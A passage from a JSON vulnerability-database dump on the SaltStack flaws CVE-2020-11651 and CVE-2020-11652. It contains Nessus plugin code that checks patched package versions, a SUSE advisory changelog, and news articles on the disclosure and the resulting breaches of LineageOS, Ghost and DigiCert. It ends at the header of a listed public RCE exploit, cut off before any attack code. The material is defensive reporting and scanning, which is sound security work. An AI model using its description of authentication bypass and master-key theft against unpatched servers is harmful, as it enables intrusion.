(\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-api-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-cloud-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-master-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-minion-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-proxy-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-spm-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-ssh-2019.2.4-1.ph3\")) flag++;\nif (rpm_check(release:\"PhotonOS-3.0\", reference:\"salt3-syndic-2019.2.4-1.ph3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T19:06:58", "description": "This update fixes the following issues :\n\nsalt :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nVarious virt backports from 3000.2\n\nAvoid traceback on debug logging for swarm module (bsc#1172075)\n\nAdd publish_batch to ClearFuncs exposed methods\n\nUpdate to salt version 3000 See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nTestsuite fix\n\nAdd option to enable/disable force refresh for zypper\n\nPython3.8 compatibility changes\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nRevert broken changes to slspath made on Salt 3000\n(saltstack/salt#56341) (bsc#1170104)\n\nReturns a the list of IPs filtered by the optional network list\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nDo not require vendored backports-abc (bsc#1170288)\n\nFix partition.mkpart to work without fstype (bsc#1169800)\n\nEnable building and installation for Fedora\n\nDisable python2 build on Tumbleweed We are removing the python2\ninterpreter from openSUSE (SLE16). As such disable salt building for\npython2 there.\n\nMore robust remote port detection\n\nSanitize grains loaded from roster_grains.json cache during\n'state.pkg'\n\nDo not make file.recurse state to fail when msgpack 0.5.4\n(bsc#1167437)\n\nBuild: Buildequire pkgconfig(systemd) instead of systemd\npkgconfig(systemd) is provided by systemd, so this is de-facto no\nchange. But inside the Open Build Service (OBS), the same symbol is\nalso provided by systemd-mini, which exists to shorten build-chains by\nonly enabling what other packages need to successfully build\n\nAdd new custom SUSE capability for saltutil state module\n\nFixes status attribute issue in aptpkg test\n\nMake setup.py script not to require setuptools greater than 9.1\n\nLoop: fix variable names for until_no_eval\n\nDrop conflictive module.run state patch (bsc#1167437)\n\nUpdate patches after rebase with upstream v3000 tag (bsc#1167437)\n\nFix some requirements issues depending on Python3 versions\n\nRemoves obsolete patch\n\nFix for low rpm_lowpkg unit test\n\nAdd python-singledispatch as dependency for python2-salt\n\nVirt._get_domain: don't raise an exception if there is no VM\n\nFix for temp folder definition in loader unit test\n\nAdds test for zypper abbreviation fix\n\nImproved storage pool or network handling\n\nBetter import cache handline\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python\n2\n\nFix regression in service states with reload argument\n\nFix integration test failure for test_mod_del_repo_multiline_values\n\nFix for unless requisite when pip is not installed\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation\n\nFix tornado imports and missing _utils after rebasing patches\n\nRemoves unresolved merge conflict in yumpkg module\n\nUse full option name instead of undocumented abbreviation for zypper\n\nRequiring python3-distro only for openSUSE/SLE >= 15 and not for\nPython 2 builds\n\nAvoid possible user escalation upgrading salt-master (bsc#1157465)\n(CVE-2019-18897)\n\nFix unit tests failures in test_batch_async tests\n\nBatch Async: Handle exceptions, properly unregister and close\ninstances after running async batching to avoid CPU starvation of the\nMWorkers (bsc#1162327)\n\nRHEL/CentOS 8 uses platform-python instead of python3\n\nLoader: invalidate the import cachefor extra modules\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nImprovements for chroot module\n\nAdd option to enable/disable force refresh for zypper\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-21T00:00:00", "title": "SUSE SLES15 Security Update : Salt (SUSE-SU-2020:1973-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-18897", "CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-proxy", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt-syndic", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-api"], "id": "SUSE_SU-2020-1973-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138794", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1973-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138794);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2019-18897\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n\n script_name(english:\"SUSE SLES15 Security Update : Salt (SUSE-SU-2020:1973-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update fixes the following issues :\n\nsalt :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nVarious virt backports from 3000.2\n\nAvoid traceback on debug logging for swarm module (bsc#1172075)\n\nAdd publish_batch to ClearFuncs exposed methods\n\nUpdate to salt version 3000 See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nTestsuite fix\n\nAdd option to enable/disable force refresh for zypper\n\nPython3.8 compatibility changes\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nRevert broken changes to slspath made on Salt 3000\n(saltstack/salt#56341) (bsc#1170104)\n\nReturns a the list of IPs filtered by the optional network list\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nDo not require vendored backports-abc (bsc#1170288)\n\nFix partition.mkpart to work without fstype (bsc#1169800)\n\nEnable building and installation for Fedora\n\nDisable python2 build on Tumbleweed We are removing the python2\ninterpreter from openSUSE (SLE16). As such disable salt building for\npython2 there.\n\nMore robust remote port detection\n\nSanitize grains loaded from roster_grains.json cache during\n'state.pkg'\n\nDo not make file.recurse state to fail when msgpack 0.5.4\n(bsc#1167437)\n\nBuild: Buildequire pkgconfig(systemd) instead of systemd\npkgconfig(systemd) is provided by systemd, so this is de-facto no\nchange. But inside the Open Build Service (OBS), the same symbol is\nalso provided by systemd-mini, which exists to shorten build-chains by\nonly enabling what other packages need to successfully build\n\nAdd new custom SUSE capability for saltutil state module\n\nFixes status attribute issue in aptpkg test\n\nMake setup.py script not to require setuptools greater than 9.1\n\nLoop: fix variable names for until_no_eval\n\nDrop conflictive module.run state patch (bsc#1167437)\n\nUpdate patches after rebase with upstream v3000 tag (bsc#1167437)\n\nFix some requirements issues depending on Python3 versions\n\nRemoves obsolete patch\n\nFix for low rpm_lowpkg unit test\n\nAdd python-singledispatch as dependency for python2-salt\n\nVirt._get_domain: don't raise an exception if there is no VM\n\nFix for temp folder definition in loader unit test\n\nAdds test for zypper abbreviation fix\n\nImproved storage pool or network handling\n\nBetter import cache handline\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python\n2\n\nFix regression in service states with reload argument\n\nFix integration test failure for test_mod_del_repo_multiline_values\n\nFix for unless requisite when pip is not installed\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation\n\nFix tornado imports and missing _utils after rebasing patches\n\nRemoves unresolved merge conflict in yumpkg module\n\nUse full option name instead of undocumented abbreviation for zypper\n\nRequiring python3-distro only for openSUSE/SLE >= 15 and not for\nPython 2 builds\n\nAvoid possible user escalation upgrading salt-master (bsc#1157465)\n(CVE-2019-18897)\n\nFix unit tests failures in test_batch_async tests\n\nBatch Async: Handle exceptions, properly unregister and close\ninstances after running async batching to avoid CPU starvation of the\nMWorkers (bsc#1162327)\n\nRHEL/CentOS 8 uses platform-python instead of python3\n\nLoader: invalidate the import cachefor extra modules\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nImprovements for chroot module\n\nAdd option to enable/disable force refresh for zypper\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1157465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159284\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1162327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1165572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167437\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169800\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170104\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170288\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173072\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.saltstack.com/en/latest/topics/releases/3000.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-18897/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11651/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11652/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201973-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6b40e28d\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1973=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1973=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1973=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1973=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-3000-5.78.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2020-05-06T09:43:58", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "description": "[](<https://thehackernews.com/images/-QFI5pQTBAm4/Xq_m167flHI/AAAAAAAAASw/6k68kbyVKkMF27nKUuZ-tsrwehX-N5saACLcBGAsYHQ/s728-e100/saltstack-salt-rce-vulnerability.jpg>)\n\nDays after cybersecurity researchers sounded the alarm over two critical vulnerabilities in the [SaltStack configuration framework](<https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html>), a hacking campaign has already begun exploiting the flaws to breach servers of LineageOS, Ghost, and DigiCert. \n \nTracked as **CVE-2020-11651** and **CVE-2020-11652**, the disclosed flaws could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. The issues were fixed by SaltStack in a [release](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>) published on April 29th. \n \n\"We expect that any competent hacker will be able to create 100% reliable exploits for these issues in under 24 hours,\" F-Secure researchers had previously warned in an advisory last week. \n\n\n \nLineageOS, a maker of an open-source operating system based on Android, said it detected the intrusion on May 2nd at around 8 pm Pacific Time. \n \n\"Around 8 pm PST on May 2nd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure,\" the [company noted](<https://status.lineageos.org/issues/5eae596b4a0ebd114676545f>) in its incident report but added Android builds and signing keys were unaffected by the breach. \n \nGhost, a Node.js based blogging platform, also fell victim to the same flaw. In its status page, the developers noted that \"around 1:30 am UTC on May 3rd, 2020, an attacker used a CVE in our SaltStack master to gain access to our infrastructure\" and install a cryptocurrency miner. \n \n\"The mining attempt spiked CPUs and quickly overloaded most of our systems, which alerted us to the issue immediately,\" [Ghost added](<https://status.ghost.org/incidents/tpn078sqk973>). \n \nGhost, however, confirmed there was no evidence the incident resulted in a compromise of customer data, passwords, and financial information. \n \nBoth LineageOS and Ghost have restored the services after taking the servers offline to patch the systems and secure them behind a new firewall. \n\n\n \nIn a separate development, the Salt vulnerability was used to hack into DigiCert certificate authority as well. \n \n\"We discovered today that [CT Log](<https://www.digicert.com/certificate-transparency/overview.htm>) 2's key used to sign SCTs (signed certificate timestamps) was compromised last night at 7 pm via the Salt vulnerability,\" DigiCert's VP of Product Jeremy Rowley said in a [Google Groups](<https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM>) post made on Sunday. \n \nIn an email conversation with The Hacker News, DigiCert also said it's deactivating its CT 2 log server following the incident but clarified that the other certificate transparency logs, CT 1, Yeti, and Nessie were not impacted. \n \n\"On May 3, DigiCert announced that it is deactivating its Certificate Transparency (CT) 2 log server after determining that the key used to sign SCTs may have been exposed via critical SALT vulnerabilities,\" the [company said](<https://www.digicert.com/digicert-statement-on-ct2-log/>). \n \n\"We do not believe the key was used to sign SCTs outside of the CT log's normal operation, though as a precaution, CAs that received SCTs from the CT2 log after May 2 at 5 pm MST should receive an SCT from another trusted log. Three other DigiCert CT logs: CT1, Yeti, and Nessie, are not affected as they are run on completely different infrastructure. The impacts are limited to only the CT2 log and no other part of DigiCert's CA or CT Log systems,\" \n \nWith F-Secure's alert revealing [more than 6,000 Salt vulnerable servers](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>) that can be exploited via this vulnerability, if left unpatched, companies are advised to update the Salt software packages to the latest version to resolve the flaws.\n", "modified": "2020-05-06T08:18:06", "published": "2020-05-04T04:00:00", "id": "THN:00FCCD16591B1900512E0B089F2A6BC8", "href": "https://thehackernews.com/2020/05/saltstack-rce-exploit.html", "type": "thn", "title": "Hackers Breach LineageOS, Ghost, DigiCert Servers Using SaltStack Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-06-10T16:22:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "description": "[](<https://thehackernews.com/images/-ydy9Fzk0nqU/XqwePD5OqUI/AAAAAAAAASk/uWabw7-xCao9P2D4zR41IqwAZjzcMPYywCLcBGAsYHQ/s728-e100/saltstack-remote-code-execution-vulnerability.jpg>)\n\nTwo severe security flaws have been discovered in the open-source [SaltStack Salt configuration framework](<https://www.saltstack.com/>) that could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. \n \nThe vulnerabilities were identified by F-Secure researchers earlier this March and disclosed on Thursday, a day after SaltStack [released](<https://github.com/saltstack/community/blob/master/doc/Community-Message.pdf>) a patch (version 3000.2) [addressing the issues](<https://docs.saltstack.com/en/latest/topics/releases/3000.2.html>), rated with CVSS score 10. \n \n\"The vulnerabilities, allocated CVE IDs [CVE-2020-11651](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) and [CVE-2020-11652](<https://nvd.nist.gov/vuln/detail/CVE-2020-11652>), are of two different classes,\" the cybersecurity [firm said](<https://labs.f-secure.com/advisories/saltstack-authorization-bypass>). \n \n\"One being authentication bypass where functionality was unintentionally exposed to unauthenticated network clients, the other being directory traversal where untrusted input (i.e., parameters in network requests) was not sanitized correctly allowing unconstrained access to the entire filesystem of the master server.\" \n\n\n \nThe researchers warned that the flaws could be exploited in the wild imminently. SaltStack is also urging users to follow the best practices to [secure the Salt environment](<https://docs.saltstack.com/en/master/topics/hardening.html#general-hardening-tips>). \n \n\n\n## Vulnerabilities in ZeroMQ Protocol\n\n \nSalt is a powerful Python-based automation and remote execution engine that's designed to allow users to issue commands to multiple machines directly. \n \nBuilt as a utility to monitor and update the state of servers, Salt employs a master-slave architecture that automates the process of pushing out configuration and software updates from a central repository using a \"master\" node that deploys the changes to a target group of \"minions\" (e.g., servers) en masse. \n \nThe [communication](<https://docs.saltstack.com/en/getstarted/system/communication.html>) between a master and minion occurs over the ZeroMQ message bus. Additionally, the master uses two ZeroMQ channels, a \"request server\" to which minions report the execution results and a \"publish server,\" where the master publishes messages that the minions can connect and subscribe to. \n \nAccording to F-Secure researchers, the pair of flaws reside within the tool's ZeroMQ protocol. \n \n\"The vulnerabilities described in this advisory allow an attacker who can connect to the 'request server' port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the 'master' server filesystem and steal the secret key used to authenticate to the master as root,\" the researchers said. \n \n\"The impact is full remote command execution as root on both the master and all minions that connect to it.\" \n \nIn other words, an attacker can exploit the flaws to call administrative commands on the master server as well as queue messages directly on the master publish server, thereby allowing the salt minions to run malicious commands. \n\n\n \nWhat's more, a directory traversal vulnerability identified in the [wheel module](<https://docs.saltstack.com/en/master/ref/wheel/all/index.html>) \u2014 which has functions to read and write files to specific locations \u2014 can permit reading of files outside of the intended directory due to a failure to properly sanitize file paths. \n \n\n\n## Detecting Vulnerable Salt Masters\n\n \nF-Secure researchers said an initial scan revealed more than 6,000 vulnerable Salt instances exposed to the public internet. \n \nDetecting possible attacks against susceptible masters, therefore, entails auditing published messages to minions for any malicious content. \"Exploitation of the authentication vulnerabilities will result in the ASCII strings \"_prep_auth_info\" or \"_send_pub\" appearing in data sent to the request server port (default 4506),\" it added. \n \nIt's highly recommended that Salt users update the software packages to the latest version. \n \n\"Adding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider Internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,\" the researchers said.\n", "modified": "2020-06-10T14:48:28", "published": "2020-05-01T13:04:00", "id": "THN:8E401822CBD35E8E7CCE9E5DD922A70E", "href": "https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html", "type": "thn", "title": "Critical SaltStack RCE Bug (CVSS Score 10) Affects Thousands of Data Centers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-19T20:10:46", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2020-05-05T00:00:00", "title": "Saltstack 3000.1 - Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-05T00:00:00", "id": "1337DAY-ID-34358", "href": "https://0day.today/exploit/description/34358", "sourceData": "# Exploit Title: Saltstack 3000.1 - Remote Code Execution\r\n# Exploit Author: Jasper Lievisse Adriaanse\r\n# Vendor Homepage: https://www.saltstack.com/\r\n# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*\r\n# Tested on: Debian 10 with Salt 2019.2.0\r\n# CVE : CVE-2020-11651 and CVE-2020-11652\r\n# Discription: Saltstack authentication bypass/remote code execution\r\n#\r\n# Source: https://github.com/jasperla/CVE-2020-11651-poc\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\n#!/usr/bin/env python\r\n#\r\n# Exploit for CVE-2020-11651 and CVE-2020-11652\r\n# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)\r\n# This exploit is based on this checker script:\r\n# https://github.com/rossengeorgiev/salt-security-backports\r\n\r\nfrom __future__ import absolute_import, print_function, 